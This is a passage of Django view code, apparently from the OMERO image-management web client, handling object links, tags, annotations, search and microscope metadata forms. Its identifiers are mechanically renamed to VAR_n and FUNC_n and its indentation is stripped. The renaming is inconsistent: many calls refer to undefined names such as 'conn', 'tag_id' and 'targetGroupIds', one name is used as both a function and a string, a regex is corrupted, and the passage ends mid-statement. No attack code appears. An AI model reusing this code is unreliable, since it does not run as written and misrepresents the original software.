if VAR_2.method not in ["POST", "DELETE"]:
return JsonResponse(
{"Error": "Need to POST or DELETE JSON VAR_158 to VAR_230 links"}, VAR_315=405
)
try:
VAR_17 = json.loads(VAR_2.body)
except TypeError:
VAR_17 = json.loads(bytes_to_native_str(VAR_2.body))
if VAR_2.method == "POST":
return FUNC_25(VAR_6, VAR_17)
elif VAR_2.method == "DELETE":
return FUNC_26(VAR_6, VAR_17)
def FUNC_25(VAR_6, VAR_17, **VAR_7):
VAR_78 = {"success": False}
VAR_79 = []
VAR_80 = "WriteOwned" in VAR_6.getCurrentAdminPrivileges()
VAR_66 = VAR_6.getUserId()
for VAR_12, VAR_82 in VAR_17.items():
if VAR_12 in ("orphaned", "experimenter"):
continue
for VAR_13, children in VAR_82.items():
for VAR_14, VAR_15 in children.items():
VAR_385 = FUNC_23(VAR_6, VAR_14, VAR_15)
for VAR_16 in VAR_15:
VAR_13 = int(VAR_13)
VAR_346 = FUNC_22(VAR_12, VAR_13, VAR_14, VAR_16)
if VAR_346 and VAR_346 != "orphan":
if VAR_80 and VAR_385[VAR_16] != VAR_66:
VAR_346.details.owner = ExperimenterI(
VAR_385[VAR_16], False
)
VAR_79.append(VAR_346)
if len(VAR_79) > 0:
VAR_255 = VAR_12.title()
if VAR_255 in ["Tagset", "Tag"]:
VAR_255 = "TagAnnotation"
try:
VAR_272 = VAR_6.getQueryService().get(VAR_255, VAR_13, VAR_6.SERVICE_OPTS)
VAR_6.SERVICE_OPTS.setOmeroGroup(VAR_272.details.group.id.val)
except omero.ValidationException:
return JsonResponse(
{"error": "Object of type %s and ID %s not found" % (VAR_255, VAR_13)},
VAR_315=404,
)
VAR_0.info("api_link: Saving %s links" % len(VAR_79))
try:
VAR_6.saveArray(VAR_79)
VAR_78["success"] = True
except Exception:
VAR_0.info(
"api_link: Exception on saveArray with %s links" % len(VAR_79)
)
for VAR_346 in VAR_79:
try:
VAR_6.saveObject(VAR_346)
except Exception:
pass
VAR_78["success"] = True
return JsonResponse(VAR_78)
def FUNC_26(VAR_6, VAR_17):
VAR_78 = {"success": False}
for VAR_12, VAR_82 in VAR_17.items():
if VAR_12 == "orphaned":
continue
for VAR_13, children in VAR_82.items():
for VAR_14, VAR_15 in children.items():
VAR_386 = FUNC_21(
VAR_6, VAR_12, VAR_13, VAR_14, VAR_15
)
if VAR_386 is None:
continue
VAR_387, VAR_240 = VAR_386
VAR_388 = [VAR_71.id.val for VAR_71 in VAR_240]
VAR_0.info("api_link: Deleting %s links" % len(VAR_388))
VAR_6.deleteObjects(VAR_387, VAR_388, wait=True)
VAR_387, VAR_389 = FUNC_21(
VAR_6, VAR_12, None, VAR_14, VAR_15
)
for rl in VAR_389:
VAR_361 = rl.parent.id.val
VAR_422 = rl.child.id.val
if VAR_361 == int(VAR_13):
continue
if VAR_12 not in VAR_78:
VAR_78[VAR_12] = {}
if VAR_361 not in VAR_78[VAR_12]:
VAR_78[VAR_12][VAR_361] = {VAR_14: []}
VAR_78[VAR_12][VAR_361][VAR_14].append(VAR_422)
VAR_78["success"] = True
return JsonResponse(VAR_78)
@login_required()
def FUNC_27(VAR_2, VAR_6=None, **VAR_7):
VAR_81 = {"image": "dataset", "dataset": "project", "plate": "screen"}
VAR_82 = []
for VAR_14, VAR_12 in VAR_81.items():
VAR_187 = VAR_2.GET.getlist(VAR_14)
if len(VAR_187) == 0:
continue
VAR_15 = []
for id in VAR_187:
for VAR_320 in id.split(","):
VAR_15.append(VAR_320)
VAR_72, VAR_223 = FUNC_21(
VAR_6, VAR_12, None, VAR_14, VAR_15
)
for VAR_346 in VAR_223:
VAR_82.append(
{
"id": VAR_346.id.val,
"parent": {"type": VAR_12, "id": VAR_346.parent.id.val},
"child": {"type": VAR_14, "id": VAR_346.child.id.val},
}
)
return JsonResponse({"data": VAR_82})
@login_required()
def FUNC_28(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_11 = FUNC_0(VAR_2, "experimenter", None)
VAR_245 = FUNC_0(VAR_2, "project", None)
VAR_246 = FUNC_0(VAR_2, "dataset", None)
VAR_256 = FUNC_0(VAR_2, "image", None)
VAR_251 = FUNC_0(VAR_2, "screen", None)
VAR_252 = FUNC_0(VAR_2, "plate", None)
VAR_257 = FUNC_0(VAR_2, "run", None)
VAR_257 = FUNC_0(VAR_2, "acquisition", VAR_257)
VAR_258 = VAR_2.GET.get("well", None)
VAR_259 = FUNC_0(VAR_2, "tag", None)
VAR_260 = FUNC_0(VAR_2, "tagset", None)
VAR_261 = FUNC_0(VAR_2, "roi", None)
VAR_262 = FUNC_0(VAR_2, "shape", None)
VAR_20 = FUNC_0(VAR_2, "group", None)
VAR_263 = FUNC_0(VAR_2, "page_size", settings.PAGE)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
if VAR_259 is not None or VAR_260 is not None:
VAR_264 = paths_to_tag(VAR_6, VAR_11, VAR_260, VAR_259)
else:
VAR_264 = paths_to_object(
VAR_6,
VAR_11,
VAR_245,
VAR_246,
VAR_256,
VAR_251,
VAR_252,
VAR_257,
VAR_258,
VAR_20,
VAR_263,
VAR_261,
VAR_262,
)
return JsonResponse({"paths": VAR_264})
@login_required()
def FUNC_29(VAR_2, VAR_6=None, **VAR_7):
if VAR_2.method == "GET":
return FUNC_30(VAR_2, VAR_6, **VAR_7)
elif VAR_2.method == "DELETE":
return FUNC_31(VAR_2, VAR_6, **VAR_7)
def FUNC_30(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_20 = FUNC_0(VAR_2, "group", -1)
VAR_259 = FUNC_0(VAR_2, "id", None)
VAR_11 = FUNC_0(VAR_2, "experimenter_id", -1)
VAR_247 = FUNC_3(VAR_2, "orphaned", False)
VAR_248 = FUNC_3(VAR_2, "sizeXYZ", False)
VAR_250 = FUNC_3(VAR_2, "date", False)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
if VAR_259 is not None:
VAR_265 = tree.marshal_tagged(
VAR_6=conn,
VAR_11=experimenter_id,
VAR_259=tag_id,
VAR_20=group_id,
VAR_87=page,
VAR_248=load_pixels,
VAR_250=date,
VAR_88=limit,
)
else:
VAR_265 = {}
VAR_265["tags"] = tree.marshal_tags(
VAR_6=conn,
VAR_247=orphaned,
VAR_11=experimenter_id,
VAR_259=tag_id,
VAR_20=group_id,
VAR_87=page,
VAR_88=limit,
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse(VAR_265)
def FUNC_31(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_266 = FUNC_2(VAR_2, "id")
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
VAR_83 = list()
VAR_84 = None
try:
for VAR_259 in VAR_266:
VAR_83.append(omero.cmd.Delete("/Annotation", VAR_259))
VAR_267 = omero.cmd.DoAll()
VAR_267.requests = VAR_83
VAR_84 = VAR_6.c.sf.submit(VAR_267, VAR_6.SERVICE_OPTS)
try:
VAR_6._waitOnCmd(VAR_84)
finally:
VAR_84.close()
except CmdError as e:
return HttpResponseBadRequest(e.message)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse("")
@login_required()
def FUNC_32(VAR_2, VAR_6=None, **VAR_7):
VAR_71 = VAR_2.GET
VAR_46 = FUNC_1(VAR_2, "image")
VAR_45 = FUNC_1(VAR_2, "dataset")
VAR_44 = FUNC_1(VAR_2, "project")
VAR_47 = FUNC_1(VAR_2, "screen")
VAR_48 = FUNC_1(VAR_2, "plate")
VAR_85 = FUNC_1(VAR_2, "acquisition")
VAR_86 = FUNC_1(VAR_2, "well")
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", VAR_1)
VAR_89 = VAR_71.get("type", None)
VAR_90 = VAR_71.get("ns", None)
VAR_91, VAR_92 = tree.marshal_annotations(
VAR_6,
VAR_44=project_ids,
VAR_45=dataset_ids,
VAR_46=image_ids,
VAR_47=screen_ids,
VAR_48=plate_ids,
VAR_85=run_ids,
VAR_86=well_ids,
VAR_89=ann_type,
VAR_90=ns,
VAR_87=page,
VAR_88=limit,
)
return JsonResponse({"annotations": VAR_91, "experimenters": VAR_92})
@login_required()
def FUNC_33(VAR_2, VAR_6=None, **VAR_7):
try:
VAR_87 = FUNC_0(VAR_2, "page", 1)
VAR_88 = FUNC_0(VAR_2, "limit", settings.PAGE)
VAR_244 = FUNC_0(VAR_2, "member_id", -1)
VAR_231 = FUNC_0(VAR_2, "owner_id", -1)
except ValueError:
return HttpResponseBadRequest("Invalid parameter value")
try:
VAR_112 = tree.marshal_shares(
VAR_6=conn, VAR_244=member_id, VAR_231=owner_id, VAR_87=page, VAR_88=limit
)
discussions = tree.marshal_discussions(
VAR_6=conn, VAR_244=member_id, VAR_231=owner_id, VAR_87=page, VAR_88=limit
)
except ApiUsageException as e:
return HttpResponseBadRequest(e.serverStackTrace)
except ServerError as e:
return HttpResponseServerError(e.serverStackTrace)
except IceException as e:
return HttpResponseServerError(e.message)
return JsonResponse({"shares": VAR_112, "discussions": VAR_268})
@login_required()
@render_response()
def FUNC_34(VAR_2, VAR_18=None, VAR_19=None, VAR_6=None, **VAR_7):
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_94 = dict()
if VAR_18 is not None:
if VAR_19 is not None and int(VAR_19) > 0:
VAR_94[VAR_347(VAR_18)] = VAR_241(VAR_19)
try:
VAR_104 = BaseContainer(VAR_6, **VAR_94)
except AttributeError as x:
return handlerInternalError(VAR_2, x)
VAR_95 = None
VAR_53 = {"manager": VAR_104, "form_well_index": VAR_95, "index": VAR_93}
VAR_54 = None
if "plate" in VAR_94 or "acquisition" in VAR_94:
VAR_269 = VAR_104.getNumberOfFields()
if VAR_269 is not None:
VAR_95 = WellIndexForm(VAR_115={"index": VAR_93, "range": VAR_269})
if VAR_93 == 0:
VAR_93 = VAR_269[0]
VAR_59 = VAR_2.GET.get("show")
if VAR_59 is not None:
VAR_348 = []
for w in VAR_59.split("|"):
if "well-" in w:
VAR_348.append(w.replace("well-", ""))
VAR_53["select_wells"] = ",".join(VAR_348)
VAR_53["baseurl"] = VAR_352("webgateway").rstrip("/")
VAR_53["form_well_index"] = VAR_95
VAR_53["index"] = VAR_93
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
VAR_54 = "webclient/VAR_158/VAR_421.html"
if VAR_18 == "acquisition":
VAR_53["acquisition"] = VAR_19
VAR_53["isLeader"] = VAR_6.isLeader()
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_35(VAR_2, VAR_6=None, **VAR_7):
VAR_96 = []
VAR_97 = set()
VAR_98 = []
VAR_68 = {}
VAR_77 = {}
for VAR_215 in ("Project", "Dataset", "Image", "Screen", "Plate"):
VAR_154 = VAR_2.GET.get(VAR_215, None)
if VAR_154 is not None:
for o in VAR_6.getObjects(VAR_215, VAR_154.split(",")):
VAR_96.append(o.getDetails().owner.id.val)
VAR_97.add(o.getDetails().group.id.val)
VAR_96 = list(set(VAR_96))
if len(VAR_96) == 0:
VAR_96 = [VAR_6.getUserId()]
for VAR_103 in VAR_6.getObjects(
"Experimenter", VAR_96, opts={"load_experimentergroups": True}
):
VAR_270 = []
VAR_77[VAR_103.id] = VAR_103.getFullName()
for VAR_101 in VAR_103.copyGroupExperimenterMap():
VAR_68[VAR_101.parent.id.val] = VAR_101.parent
VAR_270.append(VAR_101.parent.id.val)
VAR_98.append(set(VAR_270))
VAR_99 = set.intersection(*VAR_98)
VAR_100 = VAR_6.getAdminService().getSecurityRoles().userGroupId
if VAR_100 in VAR_99:
targetGroupIds.remove(VAR_100)
if len(VAR_97) == 1:
VAR_271 = VAR_97.pop()
if VAR_271 in VAR_99:
targetGroupIds.remove(VAR_271)
def FUNC_84(VAR_101):
VAR_272 = VAR_101.getDetails().permissions
return {
"write": VAR_272.isGroupWrite(),
"annotate": VAR_272.isGroupAnnotate(),
"read": VAR_272.isGroupRead(),
}
VAR_102 = []
for VAR_337 in VAR_99:
VAR_102.append(
{"id": VAR_337, "name": VAR_68[VAR_337].name.val, "perms": FUNC_84(VAR_68[VAR_337])}
)
VAR_102.sort(VAR_312=lambda x: x["name"])
VAR_77 = [[VAR_415, VAR_416] for VAR_415, VAR_416 in VAR_77.items()]
return {"owners": VAR_77, "groups": VAR_102}
@login_required()
@render_response()
def FUNC_36(VAR_2, VAR_20, VAR_21, VAR_6=None, **VAR_7):
VAR_6.SERVICE_OPTS.setOmeroGroup(int(VAR_20))
VAR_103 = getIntOrDefault(VAR_2, "owner", None)
VAR_104 = BaseContainer(VAR_6)
VAR_104.listContainerHierarchy(VAR_103)
VAR_54 = "webclient/VAR_158/chgrp_target_tree.html"
VAR_53 = {"manager": VAR_104, "target_type": VAR_21, "template": VAR_54}
return VAR_53
@login_required()
@render_response()
def FUNC_37(VAR_2, VAR_22=None, VAR_6=None, **VAR_7):
VAR_104 = BaseSearch(VAR_6)
VAR_105 = []
VAR_71 = VAR_2.GET
if VAR_22 is not None:
VAR_273 = VAR_71.get("query", None)
if VAR_273 is None:
return HttpResponse("No search '?query' included")
VAR_273 = query_search.replace("+", " ")
VAR_274 = toBoolean(VAR_71.get("advanced"))
if VAR_274:
VAR_273 = VAR_71.get("advanced_search")
VAR_54 = "webclient/search/search_details.html"
VAR_275 = VAR_71.getlist("datatype")
VAR_269 = VAR_71.getlist("field")
VAR_276 = VAR_71.get("searchGroup", None)
VAR_277 = VAR_71.get("ownedBy", None)
VAR_278 = toBoolean(VAR_71.get("useAcquisitionDate"))
VAR_279 = VAR_71.get("startdateinput", None)
VAR_279 = VAR_279 is not None and smart_str(VAR_279) or None
VAR_280 = VAR_71.get("enddateinput", None)
VAR_280 = VAR_280 is not None and smart_str(VAR_280) or None
VAR_250 = None
if VAR_279 is not None:
if VAR_280 is None:
VAR_390 = datetime.datetime.now()
VAR_280 = "%s-%02d-%02d" % (VAR_390.year, VAR_390.month, VAR_390.day)
VAR_250 = "%s_%s" % (VAR_279, VAR_280)
if len(VAR_275) == 0:
VAR_275 = ["images"]
VAR_104.search(
VAR_273,
VAR_275,
VAR_269,
VAR_276,
VAR_277,
VAR_278,
VAR_250,
rawQuery=VAR_274,
)
VAR_281 = re.compile(r"^[\VAR_364 ,]+$")
if VAR_281.search(VAR_273) is not None:
VAR_6.SERVICE_OPTS.setOmeroGroup(-1)
VAR_349 = set()
for queryId in re.split(" |,", VAR_273):
if len(queryId) == 0:
continue
try:
VAR_423 = VAR_241(queryId)
if VAR_423 in VAR_349:
continue
VAR_349.add(VAR_423)
for VAR_433 in VAR_275:
VAR_433 = VAR_433[0:-1] # remove 's'
if VAR_433 in (
"project",
"dataset",
"image",
"screen",
"plate",
"well",
):
VAR_38 = VAR_6.getObject(VAR_433, VAR_423)
if VAR_38 is not None:
VAR_105.append({"otype": VAR_433, "obj": VAR_38})
except ValueError:
pass
else:
VAR_54 = "webclient/search/search.html"
VAR_53 = {
"manager": VAR_104,
"foundById": VAR_105,
"resultCount": VAR_104.c_size + len(VAR_105),
}
VAR_53["template"] = VAR_54
VAR_53["thumbnails_batch"] = settings.THUMBNAILS_BATCH
return VAR_53
@login_required()
@render_response()
def FUNC_38(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_53 = dict()
VAR_106 = VAR_23 == "image" and list(VAR_6.getObjects("Image", [VAR_24])) or list()
VAR_107 = (
VAR_23 == "dataset" and list(VAR_6.getObjects("Dataset", [VAR_24])) or list()
)
VAR_108 = (
VAR_23 == "project" and list(VAR_6.getObjects("Project", [VAR_24])) or list()
)
VAR_109 = VAR_23 == "screen" and list(VAR_6.getObjects("Screen", [VAR_24])) or list()
VAR_110 = VAR_23 == "plate" and list(VAR_6.getObjects("Plate", [VAR_24])) or list()
VAR_111 = (
VAR_23 == "acquisition"
and list(VAR_6.getObjects("PlateAcquisition", [VAR_24]))
or list()
)
VAR_112 = (
(VAR_23 == "share" or VAR_23 == "discussion")
and [VAR_6.getShare(VAR_24)]
or list()
)
VAR_113 = VAR_23 == "well" and list(VAR_6.getObjects("Well", [VAR_24])) or list()
VAR_114 = {
"images": VAR_23 == "image" and [VAR_24] or [],
"datasets": VAR_23 == "dataset" and [VAR_24] or [],
"projects": VAR_23 == "project" and [VAR_24] or [],
"screens": VAR_23 == "screen" and [VAR_24] or [],
"plates": VAR_23 == "plate" and [VAR_24] or [],
"acquisitions": VAR_23 == "acquisition" and [VAR_24] or [],
"wells": VAR_23 == "well" and [VAR_24] or [],
"shares": ((VAR_23 == "share" or VAR_23 == "discussion") and [VAR_24] or []),
}
VAR_115 = {
"selected": VAR_114,
"images": VAR_106,
"datasets": VAR_107,
"projects": VAR_108,
"screens": VAR_109,
"plates": VAR_110,
"acquisitions": VAR_111,
"wells": VAR_113,
"shares": VAR_112,
}
VAR_116 = None
VAR_117 = None
if VAR_23 in ("share", "discussion"):
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_104 = BaseShare(VAR_6, VAR_24)
VAR_104.getAllUsers(VAR_24)
VAR_104.getComments(VAR_24)
VAR_116 = CommentAnnotationForm(VAR_115=initial)
else:
try:
VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24), "index": VAR_93})
except AttributeError as x:
return handlerInternalError(VAR_2, x)
if VAR_25 is not None:
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_53["share"] = BaseShare(VAR_6, VAR_25)
else:
VAR_54 = "webclient/annotations/metadata_general.html"
VAR_53["canExportAsJpg"] = VAR_104.canExportAsJpg(VAR_2)
VAR_53["annotationCounts"] = VAR_104.getAnnotationCounts()
VAR_117 = VAR_104.listFigureScripts()
VAR_53["manager"] = VAR_104
if VAR_23 in ("tag", "tagset"):
VAR_53["insight_ns"] = omero.rtypes.rstring(
omero.constants.metadata.NSINSIGHTTAGSET
).val
if VAR_116 is not None:
VAR_53["form_comment"] = VAR_116
VAR_53["figScripts"] = VAR_117
VAR_53["template"] = VAR_54
VAR_53["webclient_path"] = VAR_352("webindex")
return VAR_53
@login_required()
@render_response()
def FUNC_39(VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7):
VAR_53 = {}
VAR_93 = getIntOrDefault(VAR_2, "index", 0)
VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
if VAR_25:
VAR_53["share"] = BaseShare(VAR_6, VAR_25)
if VAR_23 == "well":
VAR_104.image = VAR_104.well.getImage(VAR_93)
VAR_118 = VAR_104.image.getAllRenderingDefs()
VAR_119 = {}
VAR_120 = VAR_104.image.getRenderingDefId()
for VAR_71 in VAR_118:
VAR_229 = VAR_71["owner"]["id"]
VAR_71["current"] = VAR_71["id"] == VAR_120
if VAR_229 not in VAR_119 or VAR_119[VAR_229]["id"] < VAR_71["id"]:
VAR_119[VAR_229] = VAR_71
VAR_119 = rdefs.values()
VAR_121 = []
for VAR_71 in VAR_119:
VAR_282 = []
for VAR_320, VAR_383 in enumerate(VAR_71["c"]):
VAR_350 = "-"
if VAR_383["active"]:
VAR_350 = ""
VAR_351 = VAR_383["lut"] if "lut" in VAR_383 else VAR_383["color"]
VAR_352 = "r" if VAR_383["inverted"] else "-r"
VAR_282.append(
"%s%s|%s:%s%s$%s" % (VAR_350, VAR_320 + 1, VAR_383["start"], VAR_383["end"], VAR_352, VAR_351)
)
VAR_121.append(
{
"id": VAR_71["id"],
"owner": VAR_71["owner"],
"c": ",".join(VAR_282),
"m": VAR_71["model"] == "greyscale" and "g" or "c",
}
)
VAR_122, VAR_123 = VAR_6.getMaxPlaneSize()
VAR_124 = VAR_104.image.getSizeX()
VAR_125 = VAR_104.image.getSizeY()
VAR_53["tiledImage"] = (VAR_124 * VAR_125) > (VAR_122 * VAR_123)
VAR_53["manager"] = VAR_104
VAR_53["rdefsJson"] = json.dumps(VAR_121)
VAR_53["rdefs"] = VAR_119
VAR_53["template"] = "webclient/annotations/metadata_preview.html"
return VAR_53
@login_required()
@render_response()
def FUNC_40(VAR_2, VAR_23, VAR_24, VAR_6=None, **VAR_7):
VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
VAR_53 = {"manager": VAR_104}
VAR_53["template"] = "webclient/annotations/metadata_hierarchy.html"
return VAR_53
@login_required()
@render_response()
def FUNC_41(
VAR_2, VAR_23, VAR_24, VAR_6=None, VAR_25=None, **VAR_7
):
try:
if VAR_23 in ("share", "discussion"):
VAR_54 = "webclient/annotations/annotations_share.html"
VAR_104 = BaseShare(VAR_6, VAR_24)
VAR_104.getAllUsers(VAR_24)
VAR_104.getComments(VAR_24)
else:
VAR_54 = "webclient/annotations/metadata_acquisition.html"
VAR_104 = BaseContainer(VAR_6, **{VAR_347(VAR_23): VAR_241(VAR_24)})
except AttributeError as x:
return handlerInternalError(VAR_2, x)
VAR_126 = None
VAR_127 = None
VAR_128 = None
VAR_129 = list()
VAR_130 = None
VAR_131 = list()
VAR_132 = list()
VAR_133 = list()
VAR_134 = list()
VAR_135 = list()
VAR_136 = list(VAR_6.getEnumerationEntries("LaserType"))
VAR_137 = list(VAR_6.getEnumerationEntries("ArcType"))
VAR_138 = list(VAR_6.getEnumerationEntries("FilamentType"))
VAR_139 = None
VAR_140 = None
VAR_141 = None
if VAR_23 == "image":
if VAR_25 is None:
VAR_104.companionFiles()
VAR_104.channelMetadata()
for theC, ch in enumerate(VAR_104.channel_metadata):
VAR_353 = ch.getLogicalChannel()
if VAR_353 is not None:
VAR_391 = dict()
VAR_391["form"] = MetadataChannelForm(
VAR_115={
"logicalChannel": VAR_353,
"exWave": ch.getExcitationWave(units=True),
"emWave": ch.getEmissionWave(units=True),
"illuminations": list(
VAR_6.getEnumerationEntries("IlluminationI")
),
"contrastMethods": list(
VAR_6.getEnumerationEntries("ContrastMethodI")
),
"modes": list(VAR_6.getEnumerationEntries("AcquisitionModeI")),
},
auto_id=False,
)
if VAR_25 is None:
VAR_424 = VAR_353.getLightPath()
if VAR_424 is not None:
VAR_391["form_dichroic"] = None
VAR_391["form_excitation_filters"] = list()
VAR_391["form_emission_filters"] = list()
VAR_434 = VAR_424.getDichroic()
if VAR_434 is not None:
VAR_391["form_dichroic"] = MetadataDichroicForm(
VAR_115={"dichroic": VAR_434}
)
VAR_435 = list(VAR_6.getEnumerationEntries("FilterTypeI"))
for f in VAR_424.getEmissionFilters():
VAR_391["form_emission_filters"].append(
MetadataFilterForm(
VAR_115={"filter": f, "types": VAR_435}
)
)
for f in VAR_424.getExcitationFilters():
VAR_391["form_excitation_filters"].append(
MetadataFilterForm(
VAR_115={"filter": f, "types": VAR_435}
)
)
VAR_425 = VAR_353.getDetectorSettings()
if (
VAR_425._obj is not None
and VAR_425.getDetector()
):
VAR_391["form_detector_settings"] = MetadataDetectorForm(
VAR_115={
"detectorSettings": VAR_425,
"detector": VAR_425.getDetector(),
"types": list(
VAR_6.getEnumerationEntries("DetectorTypeI")
),
"binnings": list(VAR_6.getEnumerationEntries("Binning")),
}
)
VAR_426 = VAR_353.getLightSourceSettings()
if (
VAR_426 is not None
and VAR_426._obj is not None
):
VAR_436 = VAR_426.getLightSource()
if VAR_436 is not None:
VAR_439 = VAR_136
if VAR_436.OMERO_CLASS == "Arc":
VAR_439 = VAR_137
elif VAR_436.OMERO_CLASS == "Filament":
VAR_439 = VAR_138
VAR_391["form_light_source"] = MetadataLightSourceForm(
VAR_115={
"lightSource": VAR_436,
"lightSourceSettings": VAR_426,
"lstypes": VAR_439,
"mediums": list(
VAR_6.getEnumerationEntries("LaserMediumI")
),
"pulses": list(
VAR_6.getEnumerationEntries("PulseI")
),
}
)
VAR_391["label"] = ch.getLabel()
VAR_351 = ch.getColor()
VAR_391["color"] = VAR_351 is not None and VAR_351.getHtml() or None
VAR_392 = (
VAR_104.image
and VAR_104.image.getPrimaryPixels().copyPlaneInfo(
theC=theC, theZ=0
)
)
VAR_393 = []
for pi in VAR_392:
VAR_427 = pi.getDeltaT(units="SECOND")
VAR_428 = pi.getExposureTime(units="SECOND")
if VAR_427 is None and VAR_428 is None:
continue
if VAR_427 is not None:
VAR_427 = deltaT.getValue()
if VAR_428 is not None:
VAR_428 = exposure.getValue()
VAR_393.append(
{"theT": pi.theT, "deltaT": VAR_427, "exposureTime": VAR_428}
)
VAR_391["plane_info"] = VAR_393
VAR_134.append(VAR_391)
try:
VAR_142 = VAR_104.well.getWellSample().image()
except Exception:
VAR_142 = VAR_104.image
if VAR_25 is None: # 9853
if VAR_142.getObjectiveSettings() is not None:
if VAR_139 is None:
VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
if VAR_140 is None:
VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
if VAR_141 is None:
VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
VAR_127 = MetadataObjectiveSettingsForm(
VAR_115={
"objectiveSettings": VAR_142.getObjectiveSettings(),
"objective": VAR_142.getObjectiveSettings().getObjective(),
"mediums": VAR_139,
"immersions": VAR_140,
"corrections": VAR_141,
}
)
if VAR_142.getImagingEnvironment() is not None:
VAR_126 = MetadataEnvironmentForm(VAR_115={"image": VAR_142})
if VAR_142.getStageLabel() is not None:
VAR_130 = MetadataStageLabelForm(VAR_115={"image": VAR_142})
VAR_354 = VAR_142.getInstrument()
if VAR_354 is not None:
if VAR_354.getMicroscope() is not None:
VAR_128 = MetadataMicroscopeForm(
VAR_115={
"microscopeTypes": list(
VAR_6.getEnumerationEntries("MicroscopeTypeI")
),
"microscope": VAR_354.getMicroscope(),
}
)
VAR_394 = VAR_354.getObjectives()
for o in VAR_394:
if VAR_139 is None:
VAR_139 = list(VAR_6.getEnumerationEntries("MediumI"))
if VAR_140 is None:
VAR_140 = list(VAR_6.getEnumerationEntries("ImmersionI"))
if VAR_141 is None:
VAR_141 = list(VAR_6.getEnumerationEntries("CorrectionI"))
VAR_429 = MetadataObjectiveForm(
VAR_115={
"objective": o,
"mediums": VAR_139,
"immersions": VAR_140,
"corrections": VAR_141,
},
auto_id=False,
)
VAR_129.append(VAR_429)
VAR_395 = list(VAR_354.getFilters())
if len(VAR_395) > 0:
for f in VAR_395:
VAR_437 = MetadataFilterForm(
VAR_115={
"filter": f,
"types": list(
VAR_6.getEnumerationEntries("FilterTypeI")
),
},
auto_id=False,
)
VAR_131.append(VAR_437)
VAR_396 = list(VAR_354.getDichroics())
for VAR_364 in VAR_396:
VAR_430 = MetadataDichroicForm(
VAR_115={"dichroic": VAR_364}, auto_id=False
)
VAR_132.append(VAR_430)
VAR_397 = list(VAR_354.getDetectors())
if len(VAR_397) > 0:
for VAR_364 in VAR_397:
VAR_438 = MetadataDetectorForm(
VAR_115={
"detectorSettings": None,
"detector": VAR_364,
"types": list(
VAR_6.getEnumerationEntries("DetectorTypeI")
),
},
auto_id=False,
)
VAR_133.append(VAR_438)
VAR_398 = list(VAR_354.getLightSources())
if len(VAR_398) > 0:
for laser in VAR_398:
VAR_439 = VAR_136
if laser.OMERO_CLASS == "Arc":
VAR_439 = VAR_137
elif laser.OMERO_CLASS == "Filament":
VAR_439 = VAR_138
VAR_440 = MetadataLightSourceForm(
VAR_115={
"lightSource": laser,
"lstypes": VAR_439,
"mediums": list(
VAR_6.getEnumerationEntries("LaserMediumI")
),
"pulses": list(VAR_6.getEnumerationEntries("PulseI")),
},
auto_id=False,
)
VAR_135.append(VAR_440)
VAR_53 = {"manager": VAR_104, "share_id": VAR_25}
if VAR_23 not in ("share", "discussion", "tag"):
VAR_53["form_channels"] = VAR_134
VAR_53["form_environment"] = VAR_126
VAR_53["form_objective"] = VAR_127
VAR_53["form_microscope"] = VAR_128
VAR_53["form_instrument_objectives"] = VAR_129
VAR_53["form_filters"] = VAR_131
VAR_53["form_dichroics"] = VAR_132
VAR_53["form_detectors"] = VAR_133
VAR_53["form_lasers"] = VAR_135
VAR_53["form_stageLabel"] = VAR_130
VAR_53["template"] = VAR_54
return VAR_53
@login_required()
@render_response()
def FUNC_42(VAR_2, VAR_26, VAR_6=None, VAR_25=None, **VAR_7):
VAR_142 = VAR_6.getObject("Image", VAR_26)
if VAR_142 is None:
raise Http404("No Image found with ID %s" % VAR_26)
VAR_53 = {
"template": "webclient/annotations/original_metadata.html",
"imageId": VAR_142.getId(),
}
try:
VAR_181 = VAR_142.loadOriginalMetadata()
if VAR_181 is not None:
VAR_53["original_metadata"] = VAR_181[0]
VAR_53["global_metadata"] = VAR_181[1]
VAR_53["series_metadata"] = VAR_181[2]
except omero.LockTimeout:
return HttpResponse(VAR_286="LockTimeout", VAR_315=408)
return VAR_53
def FUNC_43(VAR_2, VAR_6=None):
VAR_71 = VAR_2.GET or VAR_2.POST
VAR_106 = (
len(VAR_71.getlist("image")) > 0
and list(VAR_6.getObjects("Image", VAR_71.getlist("image")))
or list()
)
VAR_107 = (
len(VAR_71.getlist("dataset")) > 0
and list(VAR_6.getObjects("Dataset", VAR_71.getlist("dataset")))
or list()
)
VAR_108 = (
len(VAR_71.getlist("project")) > 0
and list(VAR_6.getObjects("Project", VAR_71.getlist("project")))
or list()
)
VAR_109 = (
len(VAR_71.getlist("screen")) > 0
and list(VAR_6.getObjects("Screen", VAR_71.getlist("screen")))
or list()
)
VAR_110 = (
len(VAR_71.getlist("plate")) > 0
and list(VAR_6.getObjects("Plate", VAR_71.getlist("plate")))
or list()
)
VAR_111 = (
